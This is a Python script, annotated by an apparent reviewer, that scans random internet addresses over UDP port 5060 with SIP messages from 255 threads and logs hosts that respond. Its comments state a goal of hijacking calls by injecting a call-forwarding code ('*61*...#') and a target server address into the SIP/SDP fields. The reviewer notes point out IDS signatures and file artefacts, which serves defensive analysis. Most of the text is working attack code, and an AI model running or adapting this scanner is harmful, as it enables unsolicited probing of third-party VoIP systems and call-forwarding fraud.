- import socket
- import random
- import select
- import threading
- import time
- # Scanner configuration. These module-level values are substituted into the
- # SIP message templates by findReplace().
- #IP data
- servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
- myip="70.67.16.106" # replaces MYIP, e.g. in the SDP o= and c= lines of sipdata
- port=5060 # local bind port and destination port of every probe
- #INVITE data
- name="James"
- nameto="Herbert"
- # phoneno replaces every PHONENO placeholder, so the forwarding code appears in
- # the SDP o= line built below. Where else it lands depends on the template
- # files, which are not part of this listing. A "*61*...#" string inside
- # SIP/SDP fields is a usable match for SIP firewall or IDS rules.
- phoneno="*61*16043308323#" #hijack via call forwarding USSD code
- #REGISTER data
- enableregister=0 #enable registering but most servers no longer support it
- username="SELFCHECK" #default username
- realm="asterisk" # default www authentication realm
- #SIP data
- # Static SDP body: fixed media port 49172, PCMU only, followed by a non-SDP
- # "port=" line. The layout is constant across probes, so it can be
- # fingerprinted on the wire.
- sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)
- #timeout and rate limiting options
- timeout=0.3 #0.3 s (300 ms) reply wait, passed to select() in recvDatShiz
- ratelimit=0 # seconds given to time.sleep() in scanThread; 0 means no pause
- # Fill a message template: each upper-case placeholder in `data` is replaced
- # by the matching module-level value, IPADDR by the `ip` argument, and CONTLEN
- # by the current length of sipdata. Returns the resulting string. Values are
- # inserted as-is, with no escaping or validation.
- def findReplace(data, ip):
- return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)
- # Expand the placeholders inside the SDP body itself (PHONENO, MYIP).
- sipdata=findReplace(sipdata, servip)
- #open sip data file for reading
- # The two message templates are read from fixed paths and are not included
- # in this listing. These paths, together with the /sdcard/sip.txt results
- # file written by dataCheck, are file-system artefacts to look for when
- # examining a device this script ran on.
- f=open("/sdcard/SIPSCAN1.txt", "r")
- fdata1=f.read()
- f.close()
- f=open("/sdcard/SIPSCAN2.txt", "r")
- fdata2=f.read()
- f.close()
- # One UDP socket bound to all interfaces on `port`, so outgoing probes carry
- # source port 5060. Every scan thread uses this same socket object.
- s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- s.bind(("", port))
- # Wait up to `timeout` seconds for a datagram on socket `s` and return
- # (data, addr), reading at most 4096 bytes. If nothing arrives or any error
- # occurs, the bare except swallows it and (b'', '0.0.0.0') is returned.
- # NOTE(review): indentation is lost in this listing, so the exact nesting of
- # the return statements cannot be confirmed from here.
- def recvDatShiz(s):
- try:
- s.setblocking(0)
- ready = select.select([s], [], [], timeout)
- if ready[0]:
- data, addr = s.recvfrom(4096)
- return data, addr
- except:
- pass
- return b'', '0.0.0.0'
- # Record a responding host: when a non-empty reply contains "100 ", "200 "
- # or "180 " anywhere in the datagram (a substring test, not a status-line
- # parse), print the reply and the probed `ip`, and append `ip` to
- # /sdcard/sip.txt. Returns `data`.
- # NOTE(review): `ip` is the address the caller probed; the sender address of
- # the reply is not passed in.
- def dataCheck(data, ip):
- if data!=b'':
- if b"100 " in data or b"200 " in data or b"180 " in data: # 100 Trying, 200 OK, 180 Ringing
- print(data)
- print(ip)
- f=open("/sdcard/sip.txt", "a")
- f.write(ip+"\n")
- f.close()
- return data
- # Worker loop, runs until the process exits. Each pass picks a random IPv4
- # address, sends it the filled-in template(s) over UDP, and hands any reply
- # that is not rejected by the filters below to dataCheck.
- # Seen from the receiving side this is unsolicited SIP over UDP with source
- # and destination port 5060 and a constant SDP body, sent to addresses that
- # never contacted the sender.
- # NOTE(review): indentation is lost in this listing, so which statements sit
- # under `if enableregister:` and inside the try block cannot be confirmed.
- def scanThread(fdata1, fdata2):
- while 1:
- # First octet 1..222, remaining octets 0..254 (randrange excludes the upper bound).
- ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
- # String-prefix filter: skips all of 127/8, 192/8, 172/8 and 10/8. Every
- # other generated address is probed.
- if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
- continue
- try:
- # Template 1 is used only when enableregister is set (it is 0 above).
- if enableregister:
- s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
- data, addr = recvDatShiz(s)
- if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
- continue
- dataCheck(data, ip)
- # Template 2 probe; `addr` from the reply is not used afterwards.
- s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
- data, addr = recvDatShiz(s)
- #if data!=b"":
- # print(data)
- # Replies that are empty or contain these markers are dropped.
- if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
- continue
- dataCheck(data, ip)
- # Any exception is discarded and the loop moves on to the next address.
- except Exception as e:
- #print(str(e))
- continue
- time.sleep(ratelimit)
- # Start 255 threads, each running scanThread with the same two templates.
- # The threads are not daemon threads and are never joined; all of them send
- # and receive on the single module-level socket `s`.
- for i in range(0, 255):
- threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()